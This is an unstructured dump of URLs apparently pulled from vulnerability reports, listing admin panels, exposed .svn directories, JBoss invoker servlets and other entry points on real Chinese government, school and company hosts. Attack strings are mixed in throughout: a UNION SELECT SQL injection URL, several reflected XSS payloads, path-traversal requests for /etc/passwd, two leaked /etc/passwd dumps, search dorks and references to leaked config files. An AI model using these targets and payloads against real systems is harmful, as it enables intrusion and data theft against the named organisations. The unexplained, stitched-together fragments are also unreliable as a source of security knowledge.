http://xzfw.gaoyou.gov.cn/outweb/outweb/appCase/listServiceItems.action http://rctdlz.cn/DocumentPrint/ContractApplyFamily.aspx?id= http://221.1.104.11:8011/DocumentPrint/ContractApplyFamily.aspx?id= http://221.2.171.59:8300/DocumentPrint/ContractApplyFamily.aspx?id= http://demo.inongyou.cn/DocumentPrint/ContractApplyFamily.aspx?id= http://60.2.214.118:8088/DocumentPrint/ContractApplyFamily.aspx?id= http://121.17.2.52/DocumentPrint/ContractApplyFamily.aspx?id= http://61.186.154.210:8088/DocumentPrint/ContractApplyFamily.aspx?id= wooyun.org/bugs/wooyun-2010-097083_ http://wxhd.shwxcs.cn/PhotoflyingCity/AppActivityNfc/index.action?urlcategory=1&appid=AP310000000000010634&areacode=310000&portaltype=0&columnid=&accesstype=1&ext=&version=3&usessionid=&ua=&resourceid=SV310000000333&backurl= http://www.xxx.com/shell.txt http://rctdlz.cn/DocumentPrint/LandDisputes.aspx?id= http://221.1.104.11:8011/DocumentPrint/LandDisputes.aspx?id= http://221.2.171.59:8300/DocumentPrint/LandDisputes.aspx?id= 
http://demo.inongyou.cn/DocumentPrint/LandDisputes.aspx?id= http://60.2.214.118:8088/DocumentPrint/LandDisputes.aspx?id= http://121.17.2.52/DocumentPrint/LandDisputes.aspx?id= http://61.186.154.210:8088/DocumentPrint/LandDisputes.aspx?id= http://commerceb2b.shopex123.com http://commerceb2b.shopex123.com/shopadmin http://commerceb2b.shopex123.com/home/download/cs99.php show.test.yoho.cn/admin/default/yoho http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetNewVisaCountryUrl1&cityname=%E6%97%A5%E6%9C%AC&citytype=314&locality=6&iid=0.9027713068830946 http://api.open.baidu.com/pae/channel/data/asyncqury?appid=4064&content=%20&cover=1&sender=%20&receiver=%20&extratext=4064 http://110.98.98.66/bin/PLATFORMWEB.html http://110.98.98.66/invoker/EJBInvokerServlet http://www.88box.com/service/ http://www.cnpc.com.cn:80/ www.cnpc.com.cn http://jianzhan.admin5.com/1.txt http://59.108.66.229:8083/Questionnaire/login.action http://59.108.66.229:8083/Questionnaire/fz.jsp encap:Ethernet CB:76:8C:A4 addr:172.20.1.47 Bcast:172.20.7.255 Mask:255.255.248.0 cbff:fe76:8ca4/64 Scope:Link MTU:1500 packets:139548155 packets:13630728 txqueuelen:1000 http://zb.zol.com.cn/equip.php?userid=hanggle&type=1%20and%201=2%20union%20select%201,2,user%28%29,database%28%29,version%28%29,6,7,8-- http://www.jzswsfwdt.gov.cn/install http://www.airmacau.com.tw/airshopping/eshopping_intro.asp?item=53008871 http://www.airmacau.com.tw/airshopping/eshopping_intro.asp?item=53008871 http://www.airmacau.com.tw/airshopping/eshopping_intro.asp?item=53008871 http://www.strongsoft.net/ http://www.strongsoft.net/ ldfxb.com/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 yj.yywater.gov.cn/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 shzh.wlfx.gov.cn/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 
shzh.dqwater.gov.cn/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 http://221.1.104.11:8011/ContractApply/TransferApplyMain.aspx http://221.2.171.59:8300/ContractApply/TransferApplyMain.aspx http://demo.inongyou.cn/ContractApply/TransferApplyMain.aspx http://rctdlz.cn/ContractApply/TransferApplyMain.aspx http://60.2.214.118:8088/ContractApply/TransferApplyMain.aspx http://121.17.2.52/ContractApply/TransferApplyMain.aspx http://61.186.154.210:8088/ContractApply/TransferApplyMain.aspx http://web.do1.com.cn:8888/dbase/admin/loginJsp.action https://**.**.**/admin/ https://**.**.**/svn/src/web/trunk/eccomc http://code.taobao.org/p/baiyipublish/src/trunk/application/config/database.php http://shzh.wlfx.gov.cn/Response/RespCourseList.aspx http://218.86.6.48:3505/Response/RespCourseList.aspx http://yj.yywater.gov.cn/Response/RespCourseList.aspx http://222.216.218.28:8088/Response/RespCourseList.aspx http://219.159.102.99:8088/Response/RespCourseList.aspx http://218.86.96.98:3505/Response/RespCourseList.aspx http://111.12.51.221:8088/Response/RespCourseList.aspx http://222.242.107.62:4000//Response/RespCourseList.aspx http://fxb.lucheng.gov.cn/Response/RespCourseList.aspx http://183.233.205.85:9001/Response/RespCourseList.aspx http://222.83.214.58:8088/Response/RespCourseList.aspx http://219.159.239.96:8088/Response/RespCourseList.aspx http://222.83.214.58:8088/UpLoadFile/RespCourse/201502/20150214154619068.aspx http://111.12.51.221:8088/UpLoadFile/RespCourse/201502/20150214160656203.aspx http://222.216.218.28:8088/UpLoadFile/RespCourse/201502/20150216092014020.aspx http://219.159.102.99:8088/UpLoadFile/RespCourse/201502/20150216092105373.aspx http://**.**.**/Login.aspx_ http://**.**.**/Login.aspx http://**.**.**/Login.aspx http://**.**.**/tabled.phpbh=1&lx=wsxf&pass=1 http://wooyun.org/bugs/wooyun-2010-075251 http://60.2.249.165/ http://www.enet98.com/support3-detail.aspx?id=594 
http://www.enet98.com/admin/login.aspx http://www.enet98.com/ckeditor/ckfinder/ckfinder.html http://www.fudian-bank.com/www.fudian-bank.com.rar http://www.sha-steel.com/admin/Main.aspx http://61.153.41.122:7001 http://61.153.41.122:7001/Logon.jsp http://softdl.360tpcdn.com/ http://agd.p.360.cn/ http://210.51.19.141/programupload/user/login http://114.251.243.18/hhzp/pc.action?dqzpzd=101 http://passport.mop.com/ http://hi.mop.com/space/1 http://hi.mop.com/space/ https://114.251.243.4/web/login.html http://bbs.zmifi.com/ http://218.69.249.226/login.aspx URL:http://www.cycb.com/phone.do?method=index&fkid=1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin 
apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin http://www.cycb.com/phone.do?method=index&fkid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x000A39%29%3C/scRipt%3E inurl:preview inurl:gov.cn http://preview.alashan.mca.gov.cn/article/lyzx/index.shtml?siteid=alashan http://114.251.242.196/ http://democn.b2b-builder.com/main.php?m=tg&s=admin_orderadder&id=3&type=edit 2.democn.b2b-builder.com/?m=tg&s=order&id=10 http://cn.shop-builder.cn/main.php?m=member&s=admin_orderadder&id=101&type=edit http://cn.shop-builder.cn/?m=product&s=shop_order http://democn.mall-builder.com/main.php?m=member&s=admin_orderadder&id=313&type=edit 6.democn.mall-builder.com/?m=product&s=confirm_order http://www.yaya888.com/ajax.js.php?sid=1&pid=5 http://211.138.14.10/fore/index.do http://218.249.38.215/user_center/,来到中关村展陈管理系统页面,如图所示: http://218.249.38.215/proj_man/Article/articleDetail/articleid/20,打开后测试下目录安全性,发现系统使用的是Thinkphp,如图所示: http://blog.jinku.com/batch.common.php?action=mo http://ekp.zt17.cn/ http://ekp.zt17.cn/names.nsf pass:v***** http://democn.mall-builder.com/main.php?m=member&s=admin_orderadder&id=333&type=edit http://ser.cneec.bj.cn:8084/warroom/dw/custormer_complain/new.action http://210.76.125.50:8080/datainfo/login.do.jsp http://210.76.125.50:8080/jzzj/xcpt/xwbd_1_noLogin.jsp?id=1384 http://www.snjrsj.gov.cn/hbwz/sms/login.jsp www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03 http://121.15.210.251/Account/Login URL:http://121.15.210.251/Account/Login 
URL:http://121.15.210.251/Initialize/GetSuppliers?SupplierCategory=&Name=123&pageIndex=1&pageSize=10&sortField=CreateAt&sortDirection=0&_=1424075327327 http://121.15.210.251/Initialize/GetSuppliers?SupplierCategory=&Name=123&pageIndex=1&pageSize=10&sortField=CreateAt&sortDirection=0&_=1424075327327 http://121.15.210.251/Initialize/Supplier https://github.com/kongzhidea/kongzhidea/blob/b33e58a105189a33191fc09d8efe5332163c3f2e/xweb/.svn/pristine/d9/d97e9f1a893a694f0e64da8680845f97c15b2381.svn-base http://121.15.210.251/Account/Login http://sjz.lanfw.com/zt/2009pingxuan/gs/update.php?id=711 http://agent.shenzhen.zlhome.com/iahouseinfos/agentdata http://jrappgw.jd.com/resources/downloadApp.html android:minSdkVersion="10 android:targetSdkVersion="15 http://222.82.208.13:8089/Client/login.action http://218.30.22.96/moble/kuaye/save.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated 
SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin www:x:501:501::/home/www:/sbin/nologin nagios:x:502:502::/home/nagios:/bin/bash cacti:x:503:504::/home/cacti:/bin/bash nginx:x:504:505::/home/nginx:/sbin/nologin http://news.cb.com.cn/index.php?m=content&c=index&a=lists&catid=58&issue=2098存在注入漏洞 http://www.me.ncu.edu.tw/faculty/faculty-more.php?id=30 http://help.u17.com/index.php http://help.u17.com/index.php?search-fulltext-title-\%22%3E%3Cscript%3Ealert%28%2Fwooyun%2F%29%3C%2Fscript%3E--all-0-within-time-desc-1 http://wap.cjmsa.gov.cn/webui/web/HSZX/Info.aspx?id=1 http://58.18.212.99:9084/tlwsyy/driverAction!toDriverlogin.action http://www.ahbb-l-tax.gov.cn/cms/cms/search.do http://bbs.dongting.com/home.php?mod=space&uid=1164 http://bbs.dongting.com/home.php?mod=space&username=fai http://bbs.uc.cn/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx 
http://218.16.138.249:81/UIFrameWork/login.aspx Hello:Lofter http://www.wuyishan.gov.cn/leaveword/default.aspx?hotflag=1 http://www.wuyishan.gov.cn/info/Default.aspx?comtype=13 http://www.gla.uestc.edu.cn/chinese/conference.php?id=7&act=list http://www.gla.uestc.edu.cn/chinese/conference.php?id=7&act=list http://mail.rails.cn/nsmail/index.php http://www.bxrc.org.cn/test.txt http://pic.womaiapp.com/ http://www.cofcoyoucai.com/user/editAddress.html?id=135 http://www.cofcoyoucai.com/user/editAddress.html?id=133 http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/jubaoview.aspx?id=1 http://221.2.171.59:8000/jubao/jubaoview.aspx?id=1 http://222.135.76.147:8100/jubao/jubaoview.aspx?id=1 http://222.135.109.70:8100/jubao/jubaoview.aspx?id=1 http://61.133.119.187:8089/jubao/jubaoview.aspx?id=1 http://60.217.72.17:8000/jubao/jubaoview.aspx?id=1 http://218.56.40.229:8060/jubao/jubaoview.aspx?id=1 http://218.56.40.229:8060/jubao/jubaoview.aspx?id=1 http://60.217.72.17:8000/jubao/jubaoview.aspx?id=1 http://www.clcn.net.cn/modules/guide/index.php?page_id=2 http://www.clcn.net.cn/modules/resources_tab/index.php?page_id=1 http://www.clcn.net.cn/modules/downloads/detail.php?downloads_id=1 http://www.clcn.net.cn/.svn/entries http://www.clcn.net.cn/.svn/entries http://www.clcn.net.cn/modules/announcement/.svn/entries http://www.clcn.net.cn/modules/xoopsfaq/.svn/entries http://www.clcn.net.cn/modules/information/.svn/entries http://www.clcn.net.cn/modules/resource_news/.svn/entries http://www.clcn.net.cn/modules/support/.svn/entries http://www.clcn.net.cn/special/cla/.svn/entries http://www.clcn.net.cn/modules/resources/.svn/entries http://www.clcn.net.cn/modules/theme_news/.svn/entries http://www.clcn.net.cn/modules/recommend/.svn/entries http://www.clcn.net.cn/yixuan/yixuan_cloud/.svn/entries http://www.clcn.net.cn/modules/.svn/entries http://www.clcn.net.cn/modules/event_video/.svn/entries http://www.clcn.net.cn/modules/guide/.svn/entries 
http://www.clcn.net.cn/modules/events/.svn/entries http://www.clcn.net.cn/special/beijing/.svn/entries http://www.clcn.net.cn/modules/resources_tab/.svn/entries http://www.clcn.net.cn/special/community/.svn/entries http://www.clcn.net.cn/modules/downloads/.svn/entries http://www.clcn.net.cn/special/exhibition/.svn/entries http://www.clcn.net.cn/modules/theme/.svn/entries http://www.clcn.net.cn/special/mlibrary/.svn/entries http://www.clcn.net.cn/special/exhibition/links/HZ/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/hist/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/mzd/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/lit/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/press/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/mag/.svn/entries http://www.clcn.net.cn/special/exhibition/links/shumu/.svn/entries http://www.clcn.net.cn/special/exhibition/links/duanwu/.svn/entries http://www.clcn.net.cn/special/exhibition/links/091027/.svn/entries http://www.clcn.net.cn/special/exhibition/links/ditan/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/news/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/max/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/life/.svn/entries http://shenzhen.qfang.com/sale/3146126 xss.name/Cx66AD http://58.18.89.226/ inurl:approve/common/ inurl:indexNew.action http://61.145.126.119/WebProXZ/app/entp/guide http://61.145.126.119/WebProXZ/approve/common/codeTree/indexNew.action http://121.10.6.231/app/entp/approve http://121.10.6.231/approve/common/codeTree/indexNew.action http://wzzxbs.mofcom.gov.cn/app/entp/approve http://wzzxbs.mofcom.gov.cn/approve/common/codeTree/indexNew.action http://222.240.202.23:8080/WebProHNFI/ http://222.240.202.23:8080/WebProHNFI/approve/common/codeTree/indexNew.action 
http://www.cofcoyoucai.com/search.html?key=111 http://im.koudaiyouhui.com:8082/shop/topic/topicAction!show.action http://**.**.**/seeyon/index.jsp http://**.**.**/ pss.uestc.edu.cn/tasi/admin/convert/convert.asp?action=querylist http://baoxian.cntaiping.com/b2b2e/login/toAdminLogin.action http://180.153.24.6:8180/invoker/JMXInvokerServlet http://180.153.24.6:8180/invoker/EJBInvokerHAServlet http://www.exploit-db.com/exploits/28713/ http://www.exploit-db.com/exploits/21080/ http://www.hqark.cn/WeiXin/ http://www.hqark.cn/WeiXin/.svn/ http://www.hqark.cn/WeiXin/.svn/pristine/5a/5a3f7454be66d5d09af3c6cdfe81226031900c78.svn-base http://www.hqark.cn/WeiXin/ThinkPHP/ThinkPHP.php http://www.nongyou.com.cn/ http://61.133.119.187:8091/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemManage/ItemFifth.aspx?id=1 http://222.135.76.147:8200/symItemManage/ItemFifth.aspx?id=1 http://222.135.127.190:7200/symItemManage/ItemFifth.aspx?id=1 http://221.2.149.47:8200/symItemManage/ItemFifth.aspx?id=1 http://218.59.205.41:8053/symItemManage/ItemFifth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemManage/ItemFifth.aspx?id=1 
http://221.2.171.59:8200/symItemManage/ItemFifth.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemFifth.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFifth.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFifth.aspx?id=1 http://**.**.**/product_290.html http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/StatisticalAnalysis.aspx?pid=153 http://221.2.171.59:8000/jubao/StatisticalAnalysis.aspx?pid=153 http://222.135.76.147:8100/jubao/StatisticalAnalysis.aspx?pid=153 http://222.135.109.70:8100/jubao/StatisticalAnalysis.aspx?pid=153 http://61.133.119.187:8089/jubao/StatisticalAnalysis.aspx?pid=153 http://60.217.72.17:8000/jubao/StatisticalAnalysis.aspx?pid=153 http://111.17.169.210:801/jubao/StatisticalAnalysis.aspx?pid=1429 http://111.17.169.210:801/jubao/StatisticalAnalysis.aspx?pid=1429 http://60.217.72.17:8000/jubao/StatisticalAnalysis.aspx?pid=153 http://116.199.115.230/index.php http://t.gztv.com/index.php http://116.199.115.228/ http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemManage/ItemFirst.aspx?id=1 http://222.135.76.147:8200/symItemManage/ItemFirst.aspx?id=1 http://222.135.127.190:7200/symItemManage/ItemFirst.aspx?id=1 http://221.2.149.47:8200/symItemManage/ItemFirst.aspx?id=1 http://218.59.205.41:8053/symItemManage/ItemFirst.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemManage/ItemFirst.aspx?id=1 http://221.2.171.59:8200/symItemManage/ItemFirst.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemFirst.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFirst.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFirst.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemFirst.aspx?id=1 http://ask.sdo.com/userinfo/MyReview?gameNo=70 http://ask.sdo.com/common/unjudgelist?gameno=89 http://ask.sdo.com/common/dqarticlelist?gameno=89 http://ask.sdo.com/Common/MainArticleList?gameno=88 http://mail.xxx.com.cn/src/read_file.php?signature=../../../../../../../etc/passwd 
http://mail.xxx.com.cn/src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd http://www.qzgaj.gov.cn/1.rar,下载下来看了下 http://www.qzgaj.gov.cn/qzgaj123/ http://eta.travelsky.com/sale/anony/browser!download.do www.tljt.gov.cn/zfxxgk/show.asp?id=327 http://test.baozoumanhua.com:9200/_search?pretty http://112.91.118.233:8080/phpmyadmin http://112.65.254.133:8080/jmx-console/ http://demo.phpstcms.com http://www.chinacath.net/ http://www.realdao.cn/music_rl/ http://www.yululaw.com/ http://www.anoldcd.com/ http://music.hmr12.com/ http://171.92.207.106/ http://172.30.106.10/selfservice/public/login.action http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemManage/ItemThird.aspx?id=1 http://222.135.76.147:8200/symItemManage/ItemThird.aspx?id=1 http://222.135.127.190:7200/symItemManage/ItemThird.aspx?id=1 http://221.2.149.47:8200/symItemManage/ItemThird.aspx?id=1 http://218.59.205.41:8053/symItemManage/ItemThird.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemManage/ItemThird.aspx?id=1 http://221.2.171.59:8200/symItemManage/ItemThird.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemThird.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemThird.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemThird.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemThird.aspx?id=1 http://60.213.185.51:9080/wscgs/login.do http://www.lcwscgs.com/wscgs/login.do http://60.211.179.22:9080/wscgs/login.do http://58.59.39.43:9080/wscgs/login.do http://cgs.qdpolice.gov.cn:9080/wscgs/login.do http://218.59.228.162/wscgs/login.do http://cgs.ytjj.gov.cn:9061/wscgs/login.do http://www.wfcgs.com:9080/wscgs/login.do http://www.wfcgs.com:9080/wscgs/login.do http://www.bjtel.cn/kode/index.php http://www.bjtel.cn/kode/lib/plugins/adminer/index.php http://**.**.**/LZUM/SelectSystem.aspx http://**.**.**/tower/rbac/login/ http://dmp.op.cig.com.cn/report/area/index?t=1&deep= http://wsbs.sc-n-tax.gov.cn/login.htm http://oa.chinagas.com.cn/ http://**.**.**/managers/login.asp 
memcached:124.248.32.61:11211 http://58.247.81.182:11001/phpinfo.php http://58.247.81.182:11001/fe/phpinfo.php http://58.247.81.182:11001 http://58.247.81.182:3000/dataSource/index http://220.169.248.228:8080/system/manager/login.do https://xxx/commonplugin/Download.php?reqfile=文件名 http://www.wandafilm.com/trade/movie_times.jsp?filmId=--%3E%27%22%3E%3CH1%3E http://localhost:8888/xssplatform/ClHU6C?1424493282 Service2.asmx/GetHomePageData http://www.glqxj.com/admin/login.asp img12.jiuxian.com//upheader/temp/97236b81569c4e538761d798510e878a.html http://221.1.104.11:8011/ContractApply/FamilyApplyView.aspx?ID= http://221.2.171.59:8300/ContractApply/FamilyApplyView.aspx?ID= http://demo.inongyou.cn/ContractApply/FamilyApplyView.aspx?ID= http://rctdlz.cn/ContractApply/FamilyApplyView.aspx?ID= http://60.2.214.118:8088/ContractApply/FamilyApplyView.aspx?ID= http://121.17.2.52/ContractApply/FamilyApplyView.aspx?ID= http://61.186.154.210:8088/ContractApply/FamilyApplyView.aspx?ID= http://oa.chinagas.com.cn/checkuser.aspx?uname=s http://oa.chinagas.com.cn/ListNews.aspx?type=3 http://oa.chinagas.com.cn/New/Frame_Ri.aspx?id=9034 http://**.**.**/LQL_OA/login.aspx http://tms.ijml.net/retail.jsp http://www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03 http://210.30.232.71/KaoShiAnPai.aspx?Bm=15 http://210.30.232.71/admin/login.aspx http://**.**.**/usermanager/UserMng.aspx http://www.langfly.com/topicman/SiteUser.do?backurl=&siteid=&siteuser.username=&siteuser.order=&pagesize=50&offset=0 http://hip.haday.cn:8188/HIP/main/login.do http://apt.feng.com/ http://apt.feng.com/index.php?r=upload/modify&id=54e811e50e1d15ff2a8b485e&cyuid=9511058 http://apt.feng.com/read-52fd8ad6b704b265768b469d.html http://59.173.0.46:9999/ http://www.yiban.cn/project/project.tar.gz http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtml http://m.zhenai.com/profile/qq/index.html http://www.w3.org/1999/xhtml http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js 
http://siteapp.baidu.com/site/?host=wooyun.org https://account.bilibili.com/login?appkey=243901e627b808e5&api=http%3A%2F%2Fh.bilibili.com%2Flogin%3Fact%3Dcallback%26do%3Dlogin%26go%3D&sign=707f39fc8b98dfad3b1535ddf48a5696 https://vpn.baoan.edu.cn http://jw.hrbeu.edu.cn/QHDBCONFIG.INI就会看到数据库配置信息以及加密后的账号密码等。 https://220.178.52.157 http://www.kuas.edu.tw/bin/home.php http://www2.ce.kuas.edu.tw/manage/ http://www.acce.kuas.edu.tw/admin/app/cert.asp http://3q.kuas.edu.tw/login.php http://www.che.kuas.edu.tw/admin/ http://www.lib.kuas.edu.tw/news_full.asp?nid=1684 http://2015gzbzr.hdpx.webtrn.cn https://222.85.86.119/por/login_psw.csp?right=0&point=-27115& http://bbs.21its.com/ForumInfo.aspx?id=2013112615424300001 http://zhao.07073.com/searchList?gname=test http://wenku.baidu.com/view/7792258e33d4b14e85246872.html https://202.100.241.24 http://www.haikou.gov.cn/root9/0107/201411/t20141121_810912.htm www.szkg.gov.cn/TaxiDriver/config.aspx www.szkg.gov.cn/kaoshi/config.aspx http://mall.bg68.com/httphandler/getdata.ashx http://mall.hicay.com/httphandler/getdata.ashx http://www.szatlas.com.cn/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ashx http://www.gongrenmei.com/httphandler/getdata.ashx http://www.damall.net/httphandler/getdata.ashx http://www.whjdb.gov.cn/index.php?s=admin&c=login http://cms.acfic.org.cn/seeyon/index.jsp http://crm3.byd.com.cn/login!login.action http://apt.feng.com/ http://m.wifenxiao.com/Item/detail/id/11849/sid/1005/pid/0.html http://www.jdair.net/b2c/frontend/users/modifyinfo/resetPassword.jsp http://cas.cdvcloud.com/ http://mail.163.com www.hosp1.ac.cn/wyyy/web/ksts/lcks.aspx?ksmc=%C9%F1%BE%AD%C4%DA%D2%BB%BF%C6 http://www.hneao.cn/gkkw/login.action http://ssqj.qiye.ikanshu.cn/ URL:http://hyk.fh21.com.cn:80/index.php?a=getNewAskList&c=index&m=assay POST:cache_type=2&id=1&is_cache=1 URL:http://hospital.fh21.com.cn/index.php?a=link_date http://zfcg.tsinfo.com.cn/bs_show.asp?d_ID=27 
